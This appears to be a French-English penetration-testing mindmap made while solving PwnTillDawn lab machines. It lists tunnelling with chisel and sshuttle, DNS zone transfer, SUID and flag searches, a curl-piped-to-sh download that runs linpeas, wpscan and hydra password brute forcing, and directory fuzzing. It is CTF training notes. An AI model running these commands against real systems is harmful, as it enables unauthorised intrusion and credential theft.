por Anthony Guilbert hace 3 días
252
Ver más
Mindmap I did while doing some Pwntilldawn boxes
sshuttle -r user@ip -N
Sur la victime
./chisel client ip_host:7777 R:8080:127.0.0.1:8080
Ne pas oublier d'adapter le port 8080 selon les situations
Sur l'host
chisel server -port 7777 --reverse
Subtopic
dig @mortysserver.com mortysserver.com axfr
Exemple : 10.150.150.57 rickscontrolpanel.mortysserver.com
ssh -i id_rsa user@ip
setup un listener avant
Download file
Copy-Item 'C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z' -Destination 'C:\Users\f.frizzle\Desktop\\wapt-backup-sunday.7z'
Find file
(New-Object -ComObject Shell.Application).Namespace(0xA).Items() | ForEach-Object { "$($_.Name) - $($_.Path)" }
grep -r pattern
search in files ( -recursive )
find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null
find ./* | grep FLAG3
find / \( -name ".env" -o -name ".git" \) 2>/dev/null
find / -type f -name 'FLAG[0-9].txt' 2>/dev/null
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation
find / -perm -u=s -type f 2>/dev/null
ln -s /root /home/michael/importantfiles/rootbackup
searchsploit -m chemin
searchsploit xxxx
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
multi/recon/localexploitsuggester
wpscan --url url_wordpress --passwords wordlist
wpscan --url url --enumerate u
wpscan --url url --enumerate vp,vt
https://github.com/synacktiv/phpfilterchaingenerator/blob/main/phpfilterchaingenerator.py
Dirsearch
FeroxBuster
feroxbuster -u url -w ~/Desktop/SecLists-master/Discovery/Web-Content/common.txt --filter-status 404
feroxbuster -u http://example.com -w wordlist -x php,html,txt -v -o output.txt --filter-status 404
-k pour certif autosigné
hydra -l admin -P SecLists-master/rockyou.txt 10.150.150.38 -s 30609 -t 20 http-post-form "/jacegisecurity_check:jusername=^USER^&jpassword=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"
hydra -l operator -P wordlist.txt 10.150.150.56
python3 depix.py -p pixel_image -s images/searchimages/image.png